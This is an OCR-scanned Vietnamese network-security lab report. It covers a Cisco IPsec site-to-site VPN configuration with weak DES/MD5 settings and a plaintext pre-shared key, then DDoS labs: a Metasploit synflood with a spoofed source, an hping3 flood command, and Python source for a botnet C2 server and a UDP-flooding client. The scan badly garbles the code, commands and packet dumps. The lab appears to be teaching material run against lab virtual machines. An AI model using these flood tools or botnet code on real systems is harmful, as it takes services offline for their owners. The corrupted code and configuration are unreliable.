Hình 84. Mô hình thực hiện cấu hình IPSEC VPN SITE TO SITE
1. Mô tả
Thực hiện cấu hình IPSec VPN giữa hai site đảm bảo mạng LAN thuộc SAIGON và VUNGTAU có thể giao tiếp đươc với nhau
2. Cấu hình
2.1 Cấu hình trên router SAIGON
Bước 1: Cấu hình chính sách IKE (chính sách pha 1)
SAIGON(config)#crypto isakmp policy 10
SAIGON(config-isakmp)#hash md5
SAIGON(config-isakmp)#encryption des
SAIGON(config-isakmp)#group 2
SAIGON(config-isakmp)#authentication pre-share
SAIGON (config-isakmp) #[]
Hình 85. Thông tin cấu hình chính sách IKE trên router SAIGON Bước 2: Xác định thông tin key và peer
SAIGON(config-isakmp)tauthentication pre-share
SAIGON(config-isakmp)#crypto isakmp keỵ warenl23 address 151.1.1.1 Hình 86. Thông tin key và peer trên router SAIGON
Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)
SAIGON(coníig)#crỵpto ipsec transform-set MYSET esp-des esp-md5-hmac SAIGON(cfg-crypto-trans)#1
Hình 87. Thông tin cấu hình chính sách IPSEC trên router SAIGON Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ
SAIGON(cfg-crypto-trans)#exit
SAIGON(coníig)#$ 100 permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 SaTGON írnn-ri rrì
Hình 88. Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ trên souter SAIGON Bước 5: Cấu hình crypto map
SAIGON(config)#crỵpto map MYMAP 10 ipsec-isakmp
% NOTE: This new crypto map will remain disabled until a peer and a valid access list have been configured.
SAIGON(config-crypto-map)#set peer 151.1.1.1
SAIGON (config-crypto-map) #set transform.-set MYSET SAIGON(config-crypto-map)#match address 100
SAIGON(config-crypto-map)#1
Hình 89. Cấu hình crypto map trên router SAIGON
2.2 Cấu hình trên router VUNGTAU
Bước 1: Cấu hình chính sách IKE (chính sách pha 1) VUNGTAU(config)#crỵpto isakmp policy 10 VUNGTAU(coníig-isakmp)#hasj md5
A
% Invalid input detected at 'A’ marker.
VUNGTAU(config-isakmp)#hash md5
VUNGTAU(config-isakmp)#encryption des
VUNGTAU(coníig-isakmp)#group 2
VUNGTAU(config-isakmp)#authentication pre-share
VUNGTAU (coníig-isakitip) #1______________________
Hình 90. Thông tin cấu hình chính sách IKE trên router VUNGTAU
VUNGTAU(config-isakmp)tauthentication pre-share
VUNGTAU(coníig-isakmp)#crỵpto isakmp keỵ warenl23 address 150.1.1.1
VUNGTAU(config)#1
Hình 91. Thông tin key và peer trên router VUNGTAU Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)
VUNGTAU(config)#crypto ipsec transform-set MYSET esp-des esp-md5-hmac
VUNGTAU(cfg-crypto-trans)#Ễ____________________________________________
Hình 92. Thông tin cấu hình chính sách IPSEC trên router VUNGTAU Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ
VƯNGTAU(config)100 permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
VUNGTAU(config)#1
Hình 93. Xác định luồng dữu liệu được mã hóa hay bảo về trên router VUNGTAU Bước 5: Cấu hình crypto map
VUNGTAU(config)tcrỵpto map MYMAP 10 ipsec-isakmp
% NOTE: This new crypto map will remain disabled until a peer and a valid access list have been coníigured.
VUNGTAU(config-crypto-map)#set peer 150.1.1.1 VUNGTAU(config-crypto-map)#set transform-set MYSET VUNGTAU(config-crypto-map)#match address 100
VUNGTAU(config-crypto-map)
Hình 94. Thông tin cấu hình crypto map trên router VUNGTAU 3. Kiểm tra
Kích hoạt kết nối VPN dựa vào lưu lượng xác định trên acl 100 SAIGON#ping 192.168.2.1 source 192.168.1.1
Type escape sequence to abort.
Sending 5, 100-bỵte ICMP Echos to 192.168.2.1, timeout is 2 seconds:
Packet sent with a source address of 192.168.1.1 I I I I I
Success rate ỉs 100 percent (5/5), round-trip min./avg/max = 6/6/7 Itts
SAIGON#n
Sauk hi kết nối VPN được thiết lập có thể kiểm tra thông tin về pha 1 và pha 2 Trạng thái isakmp sa:
SAIGON#show crỵpto isakmp sa IPv4 Crỵpto ISAKMP SA
dst src State conn-id status
151.1.1.1 150.1.1.1 QM_IDLE 1001 ACTIVE
IPv6 Crypto ISAKMP SA
SAIGON#n_______________________________________________________
Hình 96. Trạng thái crypto isakmp sa Trạng thái ipsec sa:
IPv6 Crỵpto ISAKMP SA
SAIGON#show crypto ipsec sa intertace: Etherneto/l
Crỵpto map tag: MYMAP, local addr 150.1.1.1
protected vrf: (none)
local ident (addr/mask/prot/port): (192.168.1.0/255.255.255.0/0/0)
remote ident (addr/mask/prot/port): (192.168.2.0/255.255.255.0/0/0)
current_peer 151.1.1.1 port 500
PERMIT, flags={origin_is_acl,}
#pkts encaps: 5, #pkts encrypt: 5, #pkts digest: 5
#pkts decaps: 5, #pkts decrỵpt: 5, #pkts verifỵ: 5
#pkts compressed: 0, #pkts decompressed: 0 Hình 97. Trạng thái IPSEC sa current outbound spi: 0xE2C6079E(3804628894)
PES (Y/N): N, DH group: none
inbound esp sas:
spi: 0xBEBBFA34(3199990324)
transtorm: esp-des esp-md5-hmac ,
in use settings ={Tunnel, }
conn id: 1, flow_id: SW:1, siblingílags 80004040, crỵpto map: MYMAP
sa timing: remaining key liíetime (k/sec): (4244386/3356)
IV size: 8 bytes
replay detection support: Y
outbound esp sas:
spi: 0XE2C6079E(3804628894)
transíorm: esp-des esp-md5-hmac ,
in use settings ={Tunnel, }
conn id: 2, flow_id: SW:2, sibling_flags 80004040, crypto map: MYMAP sa timing: remaining key lifetime (k/sec): (4244386/3356)
IV size: 8 bytes
replay detection support: Y
Stãtus: ACTIVE(ACTIVE)
Số lượng kết nối được mở ( 1 IKE và 2 IPSEC)
SAIGON#show crypto engine connections active Crỵpto Engine Connections
I
D 1 IPsecType Algorithm.DES+MD5 t EncrypŨ Decrypt5 LastSeq5N AddressIP-150.1.1.
2 IPsec DES+MD5 5 0 0 150.1.1.
100 IKE MD5+DES 0 0 0 150.1.1.
Hình 98. Số lượng kết nối SAIGON#show crypto session detail
Crỵpto session current status
Code: c - IKE Configuration mode, D - Dead Peer Detection
K - Keepalives, N - NAT-traversal, T - cTCP encapsulation
X - IKE Extended Authentication, F - IKE Eragmentation
Interface: EthernetO/1 Uptime: 00:08:30
Session status: UP-ACTIVE
Peer: 151.1.1.1 port 500 fvrf: (none) ivrf: (none)
Phasel_id: 151.1.1.1
Desc: (none)
IKEvl SA: local 150.1.1.1/500 remote 151.1.1.1/500 Active
Capabilities:(none) connid:1001 lifetime:23:51:29
IPSEC FLOW: permit ip 192.168.1.0/255.255.255.0 192.168.2.0/255.255.255.0
Active SAs: 2, origin: crypto ntap
Inbound: #pkts dec'ed 5 drop 0 life (KB/Sec) 4244386/3089
Outbound: #pkts enc'ed 5 drop 0 life (KB/Sec) 4244386/3089
LAB 8 TẤN CÔNG DDOS BẰNG SYNFLOOD VÀ HPING3 1. Tấn công ddos bằng synflood
SYN flood ( half-open attack) là một kiểu tấn công từ chối dịch vụ (DDos), tấn công này với mục đích làm cho Server không có lưu lượng để truy cập hợp pháp bằng cách tiêu thụ tất cả tài nguyên server đang có sẵn. Bằng việc gửi liên tục gửi các packet tin yêu cầu kết nối ban đầu (SYN).
Hình 100. Thông tin máy nạn nhân Bước 1 : Kiểm tra port 445 của máy nạn nhân có mở không
® /home/nguyet
nmap -p 445 192.168.36.142
starting Nmap 7.92 ( https://nmap.org ) at 2022-02-26 01:53 EST
Nmap scăn report íor 192.168.36.142
Host is up (0.00063S latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:2F:F6:56 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
® /home/nguyet
I
Hình 101. Trên máy tấn công kiểm tra port 445 của máy nạn nhân 109
1 auxiiiary/aos/nttp/squia_range_aosauxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 1normanormal1 N õ 1
11 auxiliary/dos/tcp/synflood normat No
Bước 2 : Tiến hành giả lập máy ảo với địa chỉ 192.168.0.1 để tấn công máy nạn nhân với địa chỉ 192.168.36.142
msf6 > use 111
msf 6 auxìlỉary( ) > show options Module options (auxiLỉary/dos/tcp/synflood):
Name Current Settỉng Requỉred Descriptỉon INTERFA
CE no The name of the interface
NUM no Number of SYNs to send (else unlimỉted)
RHOSTS yes The target host(s), see https://github.coin/rapid7/metasploit-frainework/wiki/Using-Metasploit
RPORT 80 yes The target port
SHOST no The spoofable source address (else randomizes)
SNAPLE 65535 yes The number of bytes to capture
SPORT no The source port (else randomizes)
TIMEOU T
500 yes The number of seconds to wait for new data ) > set RHOST192.168.36.142
) > set RPORT445
) > set SHOST 192.168.0.1
) > set TIMEOUT 30000
) > I
Hình 103. Dùng msfconsole để show các options Mở wireshark để xem thông tin các gói tin:
Đầu tiên, máy tấn công gửi 1 packet tin SYN đến Server để yêu cầu kết nối.
Sau khi tiếp nhận packet SYN, Server phản hồi lại máy khách bằng một packet SYN/ACK, để xác nhận thông tin từ Client.
Bước 3: Mở wireshark và theo dõi
Cuối cùng, Client nhận được packet tin SYN/ACK thì sẽ trả lời server bằng packet tin ACK báo
với server biết rằng nó đã nhận được packet tin SYN/ACK, kết nối đã được thiết lập và sẵn sàng trao đổi dữ liệu.
Hình 104. Gói tin bắt được khi tấn công Mở task manager và quan sát biểu đồ hoạt động
msf6 auxiliary( RHOST => 192.168.36.142 msf6 auxilỉaryC RPORT =a 445 msf6 auxìlỉary( SHOST =} 192.168.0.1 msf 6 auxỉlỉary( TIMEOUT => 30000 msf 6 auxìlỉary(
Hình 105. Biểu đồ hoạt động của cpu trên máy nạn nhân
2. Tấn công với hping 3
Hping3 là một ứng dụng đầu cuối dành cho Linux điều đó sẽ cho phép chúng tôi dễ dàng phân tích và lắp ráp các gói TCP / IP. Không giống như một ping thông thường được sử dụng để gửi các gói ICMP, ứng dụng này cho phép gửi các gói TCP, UDP và RAW-IP.
Hping3 -S 192.168.36.133 -a 192.168.36.142 -p 335 -flood ( với 192.168.36.133 là ip máy tấn công, 192.168.36.142 là ip máy nạn nhân )
® /home/nguyet
L- hping3 -s 192.168.367133 a 192.168.36.142 135 ttooơ HPING 192.168.36.133 (eth0 192.168.36.133): s set, 40 headers + 0 data bytes hping in ttood mode, no replies witt be shown
'é
— 192.168.36.133 hping statistic —
33204153 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
® /home/nguyet
L hping3 -5 192.168.367133 -a 192.168.36.142 135 —flood 1
HPING 192.168.36.133 (eth0 192.168.36.133): s set, 40 headers + 0 data bytes hping in ttood mode, no replies witt be shown
I
Hình 106. Tấn công với câu lệnh hping3 Mở task manager để xem thông tin cpu của máy nạn nhân
Hình 107. Mở taskmanager trên máy nạn nhân và theo dõi bểu đồ Mở wireshark và theo dõi gói tin
Hình 108. Mở wireshark và theo dõi gói tin 3. Tấn công ddos bằng botnet:
Botnet là một mạng lưới các máy tính được cài phần mềm để làm 1 công việc nào đó. Người ta thường nói về botnet với nghĩa xấu hơn là tốt vì botnet hay được hacker mũ đen sử dụng để tấn công một website hay một dịch vụ online nào đó
Mô hình gồm 2 máy : 1 máy attack , 1 máy victim Máy attack (linux với IP 192.168.36.155)
ethe: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.36.155 netmask 255.255.255.0 broadcast 192.168.36.255 inet6 fe80:: 20c:29ff:fecd:e6fl preíixlen 64 scopeid 0x20<link>
ether 00:0C:29:cd:e6:f1 txqueueien 1000 (Ethernet) RX packets 1315 bytes 81897 (79.9 KiB)
RX errors 0 dropped 0 overruns 0 írame 0 TX packets 1184 bytes 66420 (64.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000
Hình 109. Thông tin máy server Máy client (win 2012 với IP 192.168.36.162)
Hình 110. Thông tin máy client Bước 1: Cấu hình file server.py trên máy server
Trên máy server , ta có file sevrer.py như sau: 1346... 32.299646018 1346... 32.299654484 1346... 32.299684176 1346... 32.299692227 1346... 32.299732950 1346... 32.299741412 1346... 32.299771183 1346... 32.299779359 1346... 32.299820086 1346... 32.299828224 1346... 32.299873660 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 54 54 54 54 54 54 54 54 54 54 54 135 - 135 135 - 135 - 135 - 135 - 135 - 135 - 135 - 135 - 135 - 35797 35798 35799 35800 35801 35802 35803 35804 35805 35806 35807 [RST( [RST, [RST, [RST, [RST, [RST, [RST, [RST, [RST, [RST, [RST, ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] Seq=ỉ Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l
Ack=4138344294 Win=0 Len=0 Ack=733523711 win=0 Len=e Ack=885917960 Win=0 Len=0 Ack=2838853274 win=0 Len=0 Ack=3003729400 Wín=0 Len=0 Ack=672633979 win=0 Len=0 Ack=4267110922 Win=0 Ack=2775195647 Wín=0 Len=0Len=0 Ack=2930643947 win=0 Len=0 Ack=772416300 Wln=0 Len=0 Ack=218746685 win=0 Len=0
íroin threading import Thread íroin time import sleep
import ctypes, Socket, sys Smport plattorm, signal írom random import choice íroi typing import Union, Tuple
class Colours:
def ___init____(self):|
if platform.system() = ■Windows': kerne!32 = Ctypes.windlt.kernel32 kernel32.SetcónsoleMode(kernel32.GetStdHandle(-ll), 7) COMMANDS = { 'inío': (33, '[!] '), ■que': (34, '[?] ■), 'bad': (31, ’[-] '), ■good': (32, ■[+] ■), 'run': (97, ’[-] '), ■green': 32, 'ĩgreen': 92, 'lightgreen': 92, 'grey': 37, 'blaék': 30, 'red': 31, 'Ired': 91, 'lightred': 91, 'cyan': 36, 'lcyan': 96, 'lightcyan': 96, ■blue': 34, 'Iblue': 94, 'lightblue': 94, 'purple': 35, ■ỹeliow': 93, 'white': 97, 'Ipurple': 95, 'lightpurple': 95, 'orange': 33, ’bg': 'i7', 'bold': ■, 'italic': '3', 'under': '4',
'under':' 4' , 'strike': '09',
}
for key, vai in COMMANDS.ỉtems():
value = val[0] if ỉsỉnstance(val, tuple) else val preíix = val[l] if isỉnstance(val, tuple) else '•
locals()[key] = lambda s, preíix=prefix, key=value: _gen(s, preíix, key)
self._____dỉct___[key] = lambda s, preíix=prefỉx, key=value: self._gen(s, prefix, key)
deí _gen(self,strỉng, preíix, key):
colored = preíix if preíix else strỉng not_colored = strỉng if preíix (ìlse ''
result = '\033[{}m{}\033[0m{}'.format(key, colored, not_colored)
return result
class Server(Colours):
co=["green","Igreen","lightgreen","grey","red","Ired","lightred","cyan","lcyan","lightcyan","blue","Iblue",
deí ____init____(self, connect:Tuple[str,ỉnt]=("0.0.0.0",9999)):
super()._____inỉt____() sỉgnal.sỉgnal(sỉgnal.SIGINT, selí.exỉt_gracefully) sỉgnal.signal(sỉgnal.SIGTERM, selí.exỉt_gracefully) selí.prỉnt_logo() self.all_connectỉons = [] self.all_address = [] selí.stop = if self._bỉnd(connect): while True: self._take_cmd()
def exit_gracefully(self,sỉgnum:Unỉon[str,object]="n, frame:Unỉon[str,object]=""):
prỉnt("\nExiting....")
selí.stop =
selí.sock.close()
sleep(1) sys.exỉt(0)
def _bind(self, connect:Tuple[str,ỉnt]) -» bool:
selí.sóck = Socket.socket(socket.AF_INET, Socket.SOCK_STREAM) selí.sock.bỉnd(connect)
elií cmd = "update":
self.check(display- ,always= )
elif cmd in ['exit',"quit"]:
self. exit_graceful.Xy( )
elif "attack" in cmd:
íor 1, (ip, port) in enumerate(self.all_address):
try:
self.all_connections[i].send(cmd .encode( ))
print(self. dict [choice(self.co)](f'[+] {ip}:{port} {s
except BrokenPipeError:
del selí.all_address[i]
del self.aix_connections[i]
elií cmd = "ping" or *kilV:
íor i, (ip, port) in enumerate(self.all_address):
try:
self.all_connections[i].send(cmd.encode( ))
printíselí. dict [choice(self.co)](f'[+] {ip}:{port} {s
except BrokenPipeError:
del selí.all_address[i]
del selí.all_connections[i]
deí check(self, display:bool< , always:bool= ):
while not selí.stop:
c=0
íor n,tcp in zip(seEf.all_address,self.all_connections); C4--1
try:
tcp.send(str.encode("ping"))
if tcp.recv(1024).decode('utf-8") and display:
print(self.________dict____[choice(self.co)](f'[+] {str(n[0]
except:
if display:
printíselí.________dict_____[choice(self.co)](f'[+] {str(n[0])+":"+st deĩ selí.all_address[c-l] del selí.all_connections[c~l] continue if not always: break sleep(0.5) if _____name___ = '______main___ Server()
Bước 2: Cấu hình file client.py trên máy clientTrên máy client ta có file client.py như sau Trên máy client ta có file client.py như sau
from thxeading impoxt Thxead írom tiitte impoxt time, sleep impoxt Socket, signal impoxt sys, random from typing impoxt Tuple class Client 0:
xun=False
def ______ĩnĩt______(self, connect:Tuple[stx,ĩnt]=("192.168.36.155",9999)) -> None: signal.signal(sĩgnal.SIGINT, self.exit_gxacefullỵ)
signal.signal(sĩgnal.SIGTERM, self.exit_gxacefullỵ)
sell.stop = False sell.xun = False while not sell.stop: txy:
self._connect(connect) except Keyboaxdlnteixupt:
continue
except Exception as e:
pxĩnt(f"Exxox connectĩng {connect}I Sleep 10 seconds")
sleep(10) def exit_gxacefullỵ(self,signum, fxaine) :
pxint("XnExĩtĩng....") sell.stop = Txue sell.xun = False self.sock.close 0 sleep(1) sys.exit(0)
def _connect(self, connect:Tuple[stx,ĩnt]) -> None:
sell.sock = Socket.Socket(Socket.AF_INET, Socket.SOCK_STREAM) self.sock.connect(connect)
self.staxt()
def ______ddos(self,*axgs):
def dos(*axgs):
tl=tĩnLe ()
host,poxt=axgs[1],axgs[2]
s=socket.Socket(Socket.AF_INET, Socket.SOCK_DGRAM)
bỵtes=xandom._uxandom(10240)
s.connect((host, ĩnt(poxt)))
while sell.xun:
if not self.xun:bxeak s.sendto(bỵtes, (host,ĩnt(poxt)))
3 .sendto(bỵtes, (host,int(port)))
3.close 0
print("run time {}".format(time ()-tl)) for n in range(int(args[4])):
Thread(target = dos,args=[*args]).start ()
sleep(int(args[3]))
self.run=False
def _recv(self):
return self.sock.recv(1024).decode("ascii").lower 0 def start(selí):
while True:
data = self._recv()
if "attack" in data: data=data.replace("attack ","").split()
trỵ:
proto, ip, port, sec, workers = data
data = proto, ip, int(port), int(sec), int(workers)
self.sock.send("done".encode("ascii")) except Exception as e:
print(e)
self.sock.send("invalĩd conưnand".encode("asciĩ")) continue
self.run=Trưe
Thread(target = self._____________ddos,args=data).start()
elif "kill" in datã:
self.run=False
self.sock.send(str.encode("Server Stopped"))
elif "ping" in data:
self.sock.send(str.encode("Pong"))
else:
self.sock.send(str.encode("ERROR"))
if _____name____ == '______main____' :
Bước 3 : Thực thi file server.py trên máy server
Hình 113. Thực thi file server.py để tạo botnet Bước 4: Thực thi file client.py trên máy client
Hình 114. Thực thi file client.py để kết nối đến máy server Bước 5: Kiểm tra đã có kết nối trên máy attack
Hình 115. Kiểm tra kết nối trên máy server bằng lệnh list Bước 6: Tấn công đến máy nạn nhân
Với ip 192.168.36.162 port 10 time 80s thread 100 —»attack udp 192.168.36.162 10 80 100
[ + ] 192.168.36.162:49344 done
Bước 7 : Mở taskmanager trên máy nạn nhân và theo dõiTa thấy , cpu tăng đột ngột Ta thấy , cpu tăng đột ngột
Hình 117. Thông tin cpu trên máy nạn nhân khi bị tấn công Khi tiến hành ngừng tấn công, cpu giảm nhanh dần
Hình 118. Thông tin cpu trên máy nạn nhân khi ngừng tấn công Bước 8: Mở wireshark trên máy nạn nhân và theo dõi
99 41.486886 10041.4869 63 192.168.36.155 192.168.36.162 192.168.36.155 192.168.36.162 192.168.36.155 192.168.36.162 TCP TCP TCP 6 0 5 8 9999 -> 49351 49351 -> [P S Hj [P
ACK] Seq=73 Ack=77 win=502 Len=4 [TCP segment of a reassembled
PDU]
ACK] Seq=77 Ack=77 Win=255 Len=4 [TCP segment o f a reassembled PDU] 99 99 4935 102 41.988862 192.168.36.155 192.168.36.162 TCP 6 0 99 99 49 35 [P S
ACK] Seq=77 Ack=81 win=502 Len=4 [TCP segment o f reassembled PDU] 103 42.092193 192.168.36.162 192.168.36.155 TCP 5 4 49351 ■* 9999 [A
C Seq-81 Ack=81 win=255 Len=0 104 45.430114 192.168.36.162 192.168.36.155 TCP 5 8 49351 -> 9999 [P S
ACK] Seq=81 Ack=81 win=255 Len=4 [TCP segment o f reassembled PDU] 105 45.430493 192.168.36.155 192.168.36.162 TCP 6 0 99 99 49 35 [A
C Seq=81 Ack=85 win=502 Len=0 106 45.931753 192.168.36.155 192.168.36.162 TCP 6 0 99 99 49 35 [P S
ACK] Seq=81 Ack=85 Win=502 Len=4 [TCP segment o f reassembled PDU] 107 45.931820 192.168.36.162 192.168.36.155 TCP 5
8 49351 -*9999 [ps ACK] Seq=85 Ack=85 Win=255 Len=4 [TCPsegment of reassembled PDU]
108
45.932216109 192.168.36.155 192.168.36.162 TCP 06 9999 4935 [AC Seq-85 Ack=89 Hin=502 Len=0 46.432996 192.168.36.155 192.168.36.162
TCP 6
0 9999 4935 [PS ACK] segmentSeq=85 Ack=89 win=502 Len=4 [TCP of reassembled PDU]
110
46.483226 192.168.36.162 192.168.36.155 TCP 45 49351 ■+9999 [AC Seq=89 Ack=89 win=255 Len=0
Hình 119. Gói tin bắt được khi bị tấn công trên máy nạn nhân H I Apply a display filter...
<Cfrl~7>~